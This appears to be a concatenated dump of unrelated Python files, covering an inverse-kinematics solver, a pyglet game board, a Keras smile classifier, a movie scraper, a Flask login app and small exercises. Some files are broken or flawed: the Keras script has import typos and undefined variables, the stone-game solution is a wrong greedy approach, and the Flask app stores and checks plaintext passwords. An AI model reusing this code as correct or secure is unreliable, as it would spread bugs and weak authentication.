this_bone_outer_to_inner_uv = Util.Utils().negated(this_bone.get_fixed_bone_direction_uv())
else:
this_bone_outer_to_inner_uv = Util.Utils().negated(this_bone.get_direction_uv())
if this_bone_joint_type == "BALL":
i = 0
elif this_bone_joint_type == "GLOBAL_HINGE":
this_bone_outer_to_inner_uv = Util.Utils().project_on_to_plane(this_bone_outer_to_inner_uv,
this_bone_joint.get_hinge_rotation_axis())
elif this_bone_joint_type == "LOCAL_HINGE":
m = Util.Utils().create_rotation_matrix(chain.get_bone(loop-1).get_direction_uv())
relative_hinge_rotation_axis = Util.Utils().normalization(
Util.Utils().times(m, this_bone_joint.get_hinge_rotation_axis()))
# Project this bone's outer-to-inner direction onto the plane described by the relative hinge
# rotation axis
this_bone_outer_to_inner_uv = Util.Utils().project_on_to_plane(this_bone_outer_to_inner_uv,
relative_hinge_rotation_axis)
scale = [i * this_bone_length for i in this_bone_outer_to_inner_uv]
end_location = this_bone.get_end_point_position()
new_start_location = [x + y for x, y in zip(end_location, scale)]
this_bone.set_start_point_position(new_start_location)
# If we are not working on the base bone, then we also set the end joint location of
# the previous bone in the chain
if loop > 0:
chain.get_bone(loop-1).set_end_point_position(new_start_location)
return chain
def backward(self,chain):
for loop in range(self.chain_length):
this_bone = chain.get_bone(loop)
this_bone_length = chain.get_bone(loop).get_length()
# If we are not working on the base bone
if loop != 0:
if this_bone.is_fix_bone() == 1:
this_bone_inner_to_outer_uv = this_bone.get_fixed_bone_direction_uv()
else:
this_bone_inner_to_outer_uv = this_bone.get_direction_uv()
prev_bone_inner_to_outer_uv = chain.get_bone(loop-1).get_direction_uv()
this_bone_joint = this_bone.get_joint()
this_bone_joint_type = this_bone_joint.get_joint_type()
if this_bone_joint_type == "BALL":
angle_between_degs = Util.Utils().get_angle_between_degs(prev_bone_inner_to_outer_uv,
this_bone_inner_to_outer_uv)
constraint_angle_degs = this_bone_joint.get_ball_joint_constraint_degs()
self.deg[loop] = angle_between_degs
if angle_between_degs > constraint_angle_degs:
this_bone_inner_to_outer_uv = Util.Utils().get_angle_limited_uv(this_bone_inner_to_outer_uv,
prev_bone_inner_to_outer_uv,
constraint_angle_degs)
self.deg[loop] = constraint_angle_degs
elif this_bone_joint_type == "GLOBAL_HINGE":
# Get the hinge rotation axis and project our inner-to-outer UV onto it
this_bone_inner_to_outer_uv = Util.Utils().project_on_to_plane(this_bone_inner_to_outer_uv,
this_bone_joint.get_hinge_rotation_axis())
# If there are joint constraints, then we must honour them...
cw_constraint_degs = -this_bone_joint.get_hinge_clockwise_constraint_degs()
acw_constraint_degs = this_bone_joint.get_hinge_anticlockwise_constraint_degs()
if not Util.Utils().approximately_equal(cw_constraint_degs,
-this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
0.001) and not Util.Utils().approximately_equal(
acw_constraint_degs,
this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
0.001):
hinge_reference_axis = this_bone_joint.get_reference_axis()
hinge_rotation_axis = this_bone_joint.get_hinge_rotation_axis()
# Get the signed angle (about the hinge rotation axis) between the hinge reference axis and the hinge-rotation aligned bone UV
signed_angle_degs = Util.Utils().get_signed_angle_between_degs(hinge_reference_axis,
this_bone_inner_to_outer_uv,
hinge_rotation_axis)
self.deg[loop] = signed_angle_degs * math.pi / 180
# Make our bone inner-to-outer UV the hinge reference axis rotated by its maximum clockwise or anticlockwise rotation as required
if signed_angle_degs > acw_constraint_degs:
this_bone_inner_to_outer_uv = Util.Utils().normalization(
Mat.Mat().rotate_about_axis(hinge_reference_axis, acw_constraint_degs,
hinge_rotation_axis))
self.deg[loop] = acw_constraint_degs * math.pi / 180
elif signed_angle_degs < cw_constraint_degs:
this_bone_inner_to_outer_uv = Util.Utils().normalization(
Mat.Mat().rotate_about_axis(hinge_reference_axis, cw_constraint_degs,
hinge_rotation_axis))
self.deg[loop] = cw_constraint_degs * math.pi / 180
elif this_bone_joint_type == "LOCAL_HINGE":
# Transform the hinge rotation axis to be relative to the previous bone in the chain
hinge_rotation_axis = this_bone_joint.get_hinge_rotation_axis()
m = Util.Utils().create_rotation_matrix(prev_bone_inner_to_outer_uv)
relative_hinge_rotation_axis = Util.Utils().normalization(
Util.Utils().times(m, hinge_rotation_axis))
this_bone_inner_to_outer_uv = Util.Utils().project_on_to_plane(this_bone_inner_to_outer_uv,
relative_hinge_rotation_axis)
# Constrain rotation about reference axis if required
cw_constraint_degs = -this_bone_joint.get_hinge_clockwise_constraint_degs()
acw_constraint_degs = this_bone_joint.get_hinge_anticlockwise_constraint_degs()
if not Util.Utils().approximately_equal(cw_constraint_degs,
-this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
0.001) and not Util.Utils().approximately_equal(
acw_constraint_degs,
this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
0.001):
relative_hinge_reference_axis = Util.Utils().normalization(
Util.Utils().times(m, this_bone_joint.get_reference_axis()))
signed_angle_degs = Util.Utils().get_signed_angle_between_degs(
relative_hinge_reference_axis,
this_bone_inner_to_outer_uv,
relative_hinge_rotation_axis)
self.deg[loop] = signed_angle_degs * math.pi / 180
if signed_angle_degs > acw_constraint_degs:
this_bone_inner_to_outer_uv = Util.Utils().normalization(
Mat.Mat().rotate_about_axis(relative_hinge_reference_axis, acw_constraint_degs,
relative_hinge_rotation_axis))
self.deg[loop] = acw_constraint_degs * math.pi / 180
elif signed_angle_degs < cw_constraint_degs:
this_bone_inner_to_outer_uv = Util.Utils().normalization(
Mat.Mat().rotate_about_axis(relative_hinge_reference_axis, cw_constraint_degs,
relative_hinge_rotation_axis))
self.deg[loop] = cw_constraint_degs * math.pi / 180
# twisted = np.cross(this_bone_inner_to_outer_uv,relative_hinge_rotation_axis)
# print("bone"+str(loop))
# print(twisted)
scale = [i * this_bone_length for i in this_bone_inner_to_outer_uv]
start_location = this_bone.get_start_point_position()
new_end_location = [x + y for x, y in zip(start_location, scale)]
this_bone.set_end_point_position(new_end_location)
if loop < self.chain_length - 1:
chain.get_bone(loop+1).set_start_point_position(new_end_location)
# If we ARE working on the basebone...
else:
chain.get_bone(0).set_start_point_position(self.fixed_base_location)
if self.is_base_bone_fixed == 1:
chain.get_bone(0).set_end_point_position(self.fixed_base_location_2)
if self.chain_length > 1:
chain.get_bone(1).set_start_point_position(self.fixed_base_location_2)
else:
this_bone_joint = this_bone.get_joint()
this_bone_joint_type = this_bone_joint.get_joint_type()
if this_bone_joint_type == "GLOBAL_HINGE":
hinge_rotation_axis = this_bone_joint.get_hinge_rotation_axis()
cw_constraint_degs = -this_bone_joint.get_hinge_clockwise_constraint_degs()
acw_constraint_degs = this_bone_joint.get_hinge_anticlockwise_constraint_degs()
this_bone_inner_to_outer_uv = Util.Utils().project_on_to_plane(this_bone.get_direction_uv(),
hinge_rotation_axis)
# If we have a global hinge which is not freely rotating then we must constrain about the reference axis
if not Util.Utils().approximately_equal(cw_constraint_degs,
-this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
0.001) and not Util.Utils().approximately_equal(
acw_constraint_degs,
this_bone_joint.get_MAX_CONSTRAINT_ANGLE_DEGS(),
0.001):
hinge_reference_axis = this_bone_joint.get_reference_axis()
signed_angle_degs = Util.Utils().get_signed_angle_between_degs(hinge_reference_axis,
this_bone_inner_to_outer_uv,
hinge_rotation_axis)
self.deg[loop] = signed_angle_degs * math.pi / 180
if signed_angle_degs > acw_constraint_degs:
this_bone_inner_to_outer_uv = Util.Utils().normalization(
Mat.Mat().rotate_about_axis(hinge_reference_axis, acw_constraint_degs,
hinge_rotation_axis))
self.deg[loop] = acw_constraint_degs * math.pi / 180
elif signed_angle_degs < cw_constraint_degs:
this_bone_inner_to_outer_uv = Util.Utils().normalization(
Mat.Mat().rotate_about_axis(hinge_reference_axis, cw_constraint_degs,
hinge_rotation_axis))
self.deg[loop] = cw_constraint_degs * math.pi / 180
# twisted = np.cross(this_bone_inner_to_outer_uv, hinge_rotation_axis)
# print("bone" + str(loop))
# print(twisted)
scale = [i * this_bone_length for i in this_bone_inner_to_outer_uv]
start_location = this_bone.get_start_point_position()
new_end_location = [x + y for x, y in zip(start_location, scale)]
this_bone.set_end_point_position(new_end_location)
if self.chain_length > 1:
chain.get_bone(1).set_start_point_position(new_end_location)
if this_bone_joint_type == "BALL":
this_bone_inner_to_outer_uv = this_bone.get_direction_uv()
angle_between_degs = Util.Utils().get_angle_between_degs(self.base_bone_constraint_uv,
this_bone_inner_to_outer_uv)
constraint_angle_degs = this_bone.get_ball_joint_constraint_degs()
self.deg[loop] = angle_between_degs * math.pi / 180
if angle_between_degs > constraint_angle_degs:
this_bone_inner_to_outer_uv = Util.Utils().get_angle_limited_uv(this_bone_inner_to_outer_uv,
self.base_bone_constraint_uv,
constraint_angle_degs)
self.deg[loop] = constraint_angle_degs * math.pi / 180
scale = [i * this_bone_length for i in this_bone_inner_to_outer_uv]
start_location = this_bone.get_start_point_position()
new_end_location = [x + y for x, y in zip(start_location, scale)]
this_bone.set_end_point_position(new_end_location)
if self.chain_length > 1:
chain.get_bone(1).set_start_point_position(new_end_location)
else:
this_bone_inner_to_outer_uv = this_bone.get_direction_uv()
scale = [i * this_bone_length for i in this_bone_inner_to_outer_uv]
start_location = this_bone.get_start_point_position()
new_end_location = [x + y for x, y in zip(start_location, scale)]
this_bone.set_end_point_position(new_end_location)
if self.chain_length > 1:
chain.get_bone(1).set_start_point_position(new_end_location)
return chain
# self.draw_chain()
def get_rotations(self):
return self.rotations
def get_deg(self):
return self.deg |
991,281 | 2633b298f9424406a1ac82a6c06fe7fc54348252 | from board import Board
import pyglet
class SquareWidget:
widthpx = heightpx = 100
offsetpx = 40
def __init__(self, sq):
self.square = sq
self.column = 3 - sq.coord[0]
self.row = sq.coord[1]
self.letter = sq.letter
def draw_square(self, batch):
x = SquareWidget.offsetpx + (self.row + .5) * SquareWidget.widthpx
y = SquareWidget.offsetpx + (self.column + .5) * SquareWidget.heightpx
dx = SquareWidget.widthpx / 2 - 2
dy = SquareWidget.heightpx / 2 - 2
coords = (x - dx, y - dy,
x - dx, y + dy,
x + dx, y + dy,
x + dx, y - dy)
colors = (176, 157, 33) * 4
vertex_list = pyglet.graphics.vertex_list_indexed(4, [0, 1, 2, 3],
('v2f', coords), ('c3B', colors))
vertex_list.draw(pyglet.gl.GL_QUADS)
pyglet.text.Label(text = self.letter,font_name = 'Helvetica',
x = x, y = y, font_size=36, bold = True, anchor_x = 'center',
anchor_y = 'center', color = (0,0,0,255)).draw()
def update(self, dt):
pass
class BoardWidget:
width = height = 4
widthpx = heightpx = 408
offsetpx = 36
def __init__(self, game):
self.game = game
self.board = []
print(self.game)
for i in range(self.game.width):
row = []
for j in range(self.game.height):
row += [SquareWidget(self.game.getSquare(i,j))]
self.board += [row]
def draw_board(self, batch):
coords = (BoardWidget.offsetpx, BoardWidget.offsetpx,
BoardWidget.offsetpx + BoardWidget.widthpx, BoardWidget.offsetpx,
BoardWidget.offsetpx + BoardWidget.widthpx, BoardWidget.offsetpx + BoardWidget.heightpx,
BoardWidget.offsetpx, BoardWidget.offsetpx + BoardWidget.heightpx)
colors = (39, 156, 58) * 4
vertex_list = pyglet.graphics.vertex_list_indexed(4, [0, 1, 2, 3],
('v2f', coords), ('c3B', colors))
vertex_list.draw(pyglet.gl.GL_QUADS)
for i in range(BoardWidget.width):
for j in range(BoardWidget.height):
self.getSquare(i, j).draw_square(batch)
def getSquare(self, row, column):
try:
return self.board[row][column]
except IndexError as e:
print("IndexError")
return null
def update(self, dt):
pass
|
991,282 | 25349f6c9b1baa4211209c86da2e05a525d59260 |
"""Database module, including the SQLAlchemy database object and DB-related utilities."""
from myapp.extensions import db
from sqlalchemy.inspection import inspect
# Serialization mixin. The serialization function basically fetches all attributes the SQLAlchemy inspector
# exposes and puts it in a dict. Another option could be to implement marshmallow library
class Serializer(object):
def serialize(self):
return {prop: getattr(self, prop) for prop in inspect(self).attrs.keys()}
# Static methods, much like class methods, are methods that are bound to a class rather than its object.
# They are not dependent on the state of the object. Static method knows nothing about the class and just
# deals with the parameters
@staticmethod
def serialize_list(l):
return [m.serialize() for m in l]
class CRUDMixin(Serializer):
""" Mixin that adds convenience methods for CRUD (create, read, update, delete) operations."""
# Returns a class method for the given function. A class method is a method that is bound to a class rather
# than its object. It doesn't require creation of a class instance, much like @staticmethod.
# Unlike @staticmethod, Class method works with the class since its parameter is always the class itself.
@classmethod
def create(cls, **kwargs):
"""Create a new record and save it the database."""
instance = cls(**kwargs)
return instance.save().serialize()
def update(self, commit=True, **kwargs):
"""Update specific fields of a record."""
for attr, value in kwargs.items():
setattr(self, attr, value)
return commit and self.save() or self
def save(self, commit=True):
"""Save the record."""
db.session.add(self)
if commit:
db.session.commit()
return self
def delete(self, commit=True):
"""Remove the record from the database."""
db.session.delete(self)
if commit:
db.session.commit()
return self
class Model(CRUDMixin, db.Model):
"""Base model class that includes CRUD convenience methods."""
__abstract__ = True
|
991,283 | 2541f2ae9c56515bd68ed70ca50b7f731657e4b2 | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
from __future__ import print_function
import keras
from keras.application.vgg16 import VGG16
from keras.models import Sequential , Model
from keras.layers.core import Dense, Activation, Dropout
from keras.layers import Conv2D, MaxPooling2D, Flatten
from keras import losses
from keras.preprocessing import image
import glob
import numpy as np
from keras.utils import np_utils
from sklearn.preprocessing import normalize
from sklearn.cross_validation import train_test_split
from keras.layers import Conv2D, MaxuPooling2D
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
from keras.layers.normalization import BatchNormalization
from keras.models import model_from_json
import glob
import cv2
import random
import numpy as np
import matplotlib.pyplot as plt
def load_GE():
imlist = []
labels = []
C1files = glob.glob(r'''D:\TUT\aspl\4\files\*.jpg''' )
print('Data len: ', len((C1files)))
# Load all images
# make labels
# Convert class vectors to binary class matrices
labels = np.loadtxt(r'''D:\TUT\aspl\4\labels.txt''' )
labels = np_utils.to_categorical(labels,2)
# with open(r'''D:\TUT\aspl\4\labels.txt''') as f:
# for line in f:
# labels.append(str(line[0]))
# make images list
for file in C1files:
img = np.array(image.load_img(file))
# img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
imlist.append((img-np.amin(img))/np.amax(img))
# imlist.append((img/255.0))
return imlist,labels
X,y = load_GE()
num_classes = 2
# Data Generator and Augmentations
datag = ImageDataGenerator(
featurewise_center=False,
featurewise_std_normalization=False,
rotation_range=45,
width_shift_range=0.3,
height_shift_range=0.3,
# horizontal_flip = True, kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
# birghtness_range=(0.5, 1.2),
# fill_mode='nearest'
)
datag.fit(X_train)
#shuffle dataset randomly
data = list(zip(imlist, labels))
random.shuffle(data)
imlist, labels = zip(*data)
imlist = np.array(imlist)
labels = np.array(labels)
X_train, X_test, y_train, y_test = train_test_split(X,y)
# model construction
model = Sequential()
N = 32
w,h = 5, 5
model.add(Conv2D(N, (w, h),
input_shape=(64, 64, 3),
activation = 'relu',
padding = 'same'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
model.add(Conv2D(64, (w, h),
activation = 'relu',
padding = 'same'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
model.add(Conv2D(128, (w, h),
activation = 'relu',
padding = 'same'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
print(model.summary())
# learning
model.compile(optimizer='sgd',loss='binary_crossentropy',metrics = ['accuracy'])
epoch_counter = 1
while True:
print(' * Epoch ' + str(epoch_counter) + ' * ')
for X_batch, y_batch in datag.flow(X_train, y_train, batch_size=X_train.shape[0]):
X_batch = X_batch/255.0
model.fit(X_train, y_train, batch_size,
epochs=1,
verbose=1,
validation_split=0.15,
shuffle=True )
break
acc = model.evaluate(X_test, y_test, verbose=0)
print('Accuracy [loss, acc]: ' + str(acc))
if acc[1] > 0.90 or epoch_counter >= 50:
break
epoch_counter += 1
model_json = model.to_json()
with open("model.json", "w") as json_file:
json_file.write(model_json)
model.save_weights("model.h5")
# Evaluation
json_file = open('model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
loaded_model.compile(optimizer='sgd',loss='binary_crossentropy',metrics = ['accuracy'])
loaded_model.load_weights("model.h5")
score = loaded_model.evaluate(X_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
confusion_matrix = np.zeros((2,2))
for X, y in zip(X_test, y_test):
X = X.reshape(64,64,3)
result = loaded_model.predict(X)
confusion_matrix[np.argmax(y), np.argmax(result[0])] += 1
print('Confusion Matrix'+confusion_matrix)
# Results Visualization
for i, (X, y)in enumerate(zip(X_test, y_test)):
plt.imshow(X)
plt.show()
print('prediction: ', model.predict(X.reshape(64,64,3)))
print('ground true:', y)
if i == 20:
break
# Play Video
def logVideoMetadata(video):
print('current pose: ' + str(video.get(cv2.CAP_PROP_POS_MSEC)))
print('0-based index: ' + str(video.get(cv2.CAP_PROP_POS_FRAMES)))
print('pose: ' + str(video.get(cv2.CAP_PROP_POS_AVI_RATIO)))
print('width: ' + str(video.get(cv2.CAP_PROP_FRAME_WIDTH)))
print('height: ' + str(video.get(cv2.CAP_PROP_FRAME_HEIGHT)))
print('fps: ' + str(video.get(cv2.CAP_PROP_FPS)))
print('codec: ' + str(video.get(cv2.CAP_PROP_FOURCC)))
print('frame count: ' + str(video.get(cv2.CAP_PROP_FRAME_COUNT)))
print('format: ' + str(video.get(cv2.CAP_PROP_FORMAT)))
print('mode: ' + str(video.get(cv2.CAP_PROP_MODE)))
print('brightness: ' + str(video.get(cv2.CAP_PROP_BRIGHTNESS)))
print('contrast: ' + str(video.get(cv2.CAP_PROP_CONTRAST)))
print('saturation: ' + str(video.get(cv2.CAP_PROP_SATURATION)))
print('hue: ' + str(video.get(cv2.CAP_PROP_HUE)))
print('gain: ' + str(video.get(cv2.CAP_PROP_GAIN)))
print('exposure: ' + str(video.get(cv2.CAP_PROP_EXPOSURE)))
print('convert_rgb: ' + str(video.get(cv2.CAP_PROP_CONVERT_RGB)))
print('rect: ' + str(video.get(cv2.CAP_PROP_RECTIFICATION)))
print('iso speed: ' + str(video.get(cv2.CAP_PROP_ISO_SPEED)))
print('buffersize: ' + str(video.get(cv2.CAP_PROP_BUFFERSIZE)))
def hot_ent_to_text(prediction):
print(prediction)
if(prediction[0,0] > prediction[0,1]):
return 'NON-SMILE'
else:
return 'SMILE'
video = cv2.VideoCapture()
video_path = './smile_movie.MOV'
video.open(video_path)
if not video.isOpened():
print('Error: unable to open video: ' + video_path)
logVideoMetadata(video)
resize_ratio = 0.125
roi = [150,550,800,800]
blur_kernel_size = 5
total_frames = int(video.get(cv2.CAP_PROP_FRAME_COUNT) )
for i in range(total_frames):
ret, orig_img = video.read()
if i%20 != 0:
continue
img = orig_img[roi[0]:roi[0]+roi[2],roi[1]:roi[1]+roi[3]]
img = cv2.blur(img, (blur_kernel_size,blur_kernel_size))
img = cv2.resize(img, (64, 64), interpolation=cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.flip( img, 0 )
plt.imshow(img)
plt.show()
prediction = model.predict(img.reshape(1,64,64,3))
print(hot_ent_to_text(prediction))
print(30*'*')
|
991,284 | 56bde6d86ae34dc7cb3d4cb42ae11342b9649c3f | class Solution:
def stoneGameIII(self, stoneValue):
length = len(stoneValue)
alice, bob = 0, 0
alice_total, bob_total = 0, 0
turn = "alice"
while True:
if alice >= length or bob >= length:
break
if turn == "alice":
tmp = 0
local_max = None
local_max_id = None
for i in range(alice, min(alice+3, length)):
value = stoneValue[i]
tmp = tmp + value
if local_max is None:
local_max = tmp
local_max_id = i
elif tmp > local_max:
local_max = tmp
local_max_id = i
if local_max:
alice_total = alice_total + local_max
bob = local_max_id + 1
turn = "bob"
if turn == "bob":
tmp = 0
local_max = None
local_max_id = None
for i in range(bob, min(bob+3, length)):
value = stoneValue[i]
tmp = tmp + value
if local_max is None:
local_max = tmp
local_max_id = i
elif tmp > local_max:
local_max = tmp
local_max_id = i
if local_max:
bob_total = bob_total + local_max
alice = local_max_id + 1
turn = "alice"
print(alice_total, bob_total)
if alice_total > bob_total:
return "Alice"
elif alice_total < bob_total:
return "Bob"
else:
return "Tie"
|
991,285 | be5dab1bc460e1433de160348344f77ce2530aa4 | import csv
import requests
from fake_useragent import UserAgent
from lxml import etree
from time import sleep
from random import randint
def get_html(url):
"""获得html"""
headers = {'User-Agent': str(UserAgent(path="C:/Users/Hanrey/Desktop/ua.json").random)}
# headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ''Chrome/68.0.3440.106 Safari/537.36'}
response = requests.get(url, headers=headers)
response.encoding = 'utf-8'
sleep(randint(5,8))
if response.status_code == 200:
return response.text
else:
return 'error'
def parse_index(html):
"""获得电影详细页面的url"""
e = etree.HTML(html)
all_url = e.xpath('//div[@class="channel-detail movie-item-title"]/a/@href')
print(all_url)
return ['https://maoyan.com{}'.format(url) for url in all_url]
def parse_grade(html):
"在全部页面获得电影评分"
grade_lst = []
e = etree.HTML(html)
grade_int = e.xpath('//div[@class="channel-detail channel-detail-orange"]/i[@class="integer"]/text()')
grade_fra = e.xpath('//div[@class="channel-detail channel-detail-orange"]/i[@class="fraction"]/text()')
for i in range(len(grade_fra)):
grade_lst.append("%s%s"%(grade_int[i],grade_fra[i]))
return grade_lst
def parse_info(html):
"""电影名、类型、国家、上映时间"""
e = etree.HTML(html)
name = e.xpath('//h1[@class="name"]/text()')
type = e.xpath('//li[@class="ellipsis"][1]/a[@class="text-link"]/text()')
country = e.xpath('//li[@class="ellipsis"][2]/text()')
time = e.xpath('//li[@class="ellipsis"][3]/text()')
return {
"name": name,
"type": type,
"country": country,
"time": time
}
def main():
pages = 10 #输入要爬取的页面
header = ['name', 'type', 'country', 'time', 'grade']
datas = []
for i in range(0, 30*pages, 30):
index_url = 'https://maoyan.com/films?showType=3&sortId=3&offset=' + str(i)
html = get_html(index_url)
grade = parse_grade(html) #得到该页评分列表
movies_html = parse_index(html)
i = 0
for url in movies_html:
movies_html = get_html(url)
moive = parse_info(movies_html)
moive['grade'] = grade[i] #添加评分数据
if moive['name'] != []: #数据清洗
name = moive['name'][0]
moive['name'] = name
country = str(moive['country']).split('/')[0].strip("['").strip().strip("\\n").strip() #格式化国家
moive['country'] = country
time = moive['time'][0]
moive['time'] = time
i += 1
datas.append(moive)
print(moive)
else:
print("数据丢失!")
with open("movie_info.csv", 'a', newline='', encoding='utf-8') as csv_file:
write = csv.DictWriter(csv_file, fieldnames=header)
write.writeheader()
write.writerows(datas)
if __name__ == '__main__':
main() |
991,286 | 65de37eada91a75cc02b863dbdbe15d59d769d1e | from flask import Flask,render_template,request,redirect,url_for,session
from model import check_user,add_user_Todb,check_product,addproduct_todb
app = Flask(__name__)
app.secret_key = 'hello'
@app.route('/')
@app.route('/home')
def home():
return render_template('home.html',title = 'home')
@app.route('/about')
def about():
return render_template('about.html',title='about')
@app.route('/contact')
def contact():
return render_template('contact.html',title='contact')
@app.route('/signup',methods=['GET','POST'])
def signup():
if request.method == 'POST':
userinfo = {}
userinfo['username'] = request.form['username']
userinfo['fullname'] = request.form['fullname']
userinfo['password'] = request.form['password1']
password2 = request.form['password2']
userinfo['email'] = request.form['email']
userinfo['type'] = request.form['type']
if userinfo['password'] != password2:
return "Password fields dint mantch"
if bool(check_user(userinfo['username'])) is True:
return "user already exists.try logging in"
add_user_Todb(userinfo)
return redirect(url_for('home'))
return redirect(url_for('home'))
@app.route('/login',methods = ['GET','POST'])
def login():
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
if bool(check_user(username)) and (check_user(username)['password']==password):
# if bool(check_user(username)) and (check_user(username)['password']==password):
session['username'] = username
session['type'] = check_user(username)['type']
return redirect(url_for('home'))
return "username or password is in correct"
return redirect(url_for('home'))
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('home'))
# @app.route('/login',methods =['GET','POST'])
# def login():
# if request.method =='POST':
# db = {'newuser' :'12345','Testuser':'12345'}
# username = request.form['username']
# password = request.form['password']
# if username in db and db[username] == password:
# return redirect(url_for('about'))
# return "username and password is incorrect"
@app.route('/products',methods=['GET','POST'])
def products():
if request.method == 'POST':
productinfo = {}
productinfo['pname'] = request.form['pname']
productinfo['price'] = request.form['price']
productinfo['description'] = request.form['description']
productinfo['seller'] = session['username']
if bool(check_product(productinfo['pname'])) is True:
return "Product already in cart"
addproduct_todb(productinfo)
return redirect(url_for('products'))
return redirect(url_for('products'))
if __name__ == '__main__':
app.run(debug = True) |
991,287 | 7b480b508fc082bd44699b3765985666f6a32593 | # r/dailyprogrammer
# easy #380
# Smooshed Morse Code 1
# write Moorse code generator
def smorse(text):
code = {
'a' : '.-',
'b' : '-...',
'c' : '-.-.',
'd' : '-..',
'e' : '.',
'f' : '..-.',
'g' : '--.',
'h' : '....',
'i' : '..',
'j' : '.---',
'k' : '-.-',
'l' : '.-..',
'm' : '--',
'n' : '-.',
'o' : '---',
'p' : '.--.',
'q' : '--.-',
'r' : '.-.',
's' : '...',
't' : '-',
'u' : '..-',
'v' : '...-',
'w' : '.--',
'x' : '-..-',
'y' : '-.--',
'z' : '--..'
}
text = text.lower()
print(text, "==> ", end='')
'''
#first version
for t in text:
for key, value in code.items():
if t in key:
print(value, end = '')
print('')
'''
for t in range(len(text)):
print(code[text[t]], end = '')
print('')
smorse("sos")
smorse("daily")
smorse("programmer")
smorse("bits")
smorse("three")
|
991,288 | 375dba8ce959807684362b295f5a624259d62236 | import requests
import json
## Swiftly API URLS
routes_url = 'http://api.transitime.org/api/v1/key/dca04420/agency/san-joaquin/command/routes?format=json'
route_details_url = 'http://api.transitime.org/api/v1/key/dca04420/agency/san-joaquin/command/routesDetails?r='
times_vert_url = 'http://api.transitime.org/api/v1/key/dca04420/agency/san-joaquin/command/scheduleVertStops?r='
times_hori_url = 'http://api.transitime.org/api/v1/key/dca04420/agency/san-joaquin/command/scheduleHorizStops?r='
file_type = '.json'
routes = []
## Gets list of routes currently in service
list_data = requests.get(routes_url).json()
with open ('/Users/Macbook/Documents/RTD/departureScreen/json/route_list/routes.json', 'w') as route_list_file:
route_list_file.write(json.dumps(list_data, indent = 4))
## Gets all current Route IDs from 'routes_url' and appends to routes array
get_routes = requests.get(routes_url).json()
for route_id in get_routes['routes']:
routes.append(route_id['id'])
## Loops through routes array to read and write JSON files for each route using URLS given
for route in routes:
## For route details
route_details = requests.get(route_details_url + route + '&format=json')
route_data = route_details.json()
with open('/Users/Macbook/Documents/RTD/departureScreen/json/route_details/' + route + file_type, 'w') as route_detail_file:
route_detail_file.write(json.dumps(route_data, indent = 4))
## For vertical timetable
times_vert = requests.get(times_vert_url + route + '&format=json')
vert_data = times_vert.json()
with open('/Users/Macbook/Documents/RTD/departureScreen/json/times_vert/' + route + file_type, 'w') as times_vert_file:
times_vert_file.write(json.dumps(vert_data, indent = 4))
## For horizontal timetable
times_hori = requests.get(times_hori_url + route + '&format=json')
hori_data = times_hori.json()
with open('/Users/Macbook/Documents/RTD/departureScreen/json/times_hori/' + route + file_type, 'w') as times_hori_file:
times_hori_file.write(json.dumps(hori_data, indent = 4)) |
991,289 | 010f53728ccc228fcd3a07477b315c4b1f2298b2 | from itertools import chain, takewhile, dropwhile
from itertools import combinations, permutations
a = [1, 2, 3]
b = 'abc'
print [(x, type(x)) for x in chain(a, b)]
print [u''.join(x) for x in combinations(b, 2)]
print [u''.join(x) for x in permutations(b, 2)]
print list(takewhile(lambda x: x % 2 == 1, a))
print list(dropwhile(lambda x: x in 'aeiou', b))
|
991,290 | 48828acc1a9417a217bc85d5e4c82312f77c0017 | import math
math.pi
print("Inserire 1 se si vuole calcolare il volume del cubo")
print("Inserire 2 se si vuole calcolare il volume della sfera")
s=input()
s=int(s)
if s==1 :
l=input("Inserire il lato del cubo ")
l=int(l)
v=l**3
print("Il volume del cubo e ",v)
elif s==2 :
r=input("Inserire il raggio della sfera ")
r=int(r)
v=(4./3.)*math.pi*r**3
print("Il volume della sfera e ",v)
else:
print("ERRORE") |
991,291 | b2afd36bf2dd6e651fce7110f7baf9f9d716050c | from django.shortcuts import render_to_response
from django.template import RequestContext
def contato(request):
return render_to_response(
'contato.html',
locals(),
context_instance=RequestContext(request),
) |
991,292 | 08704c3de92db48b535b8ac83b24ed9cbbe5a089 | #!/usr/bin/env python
import os
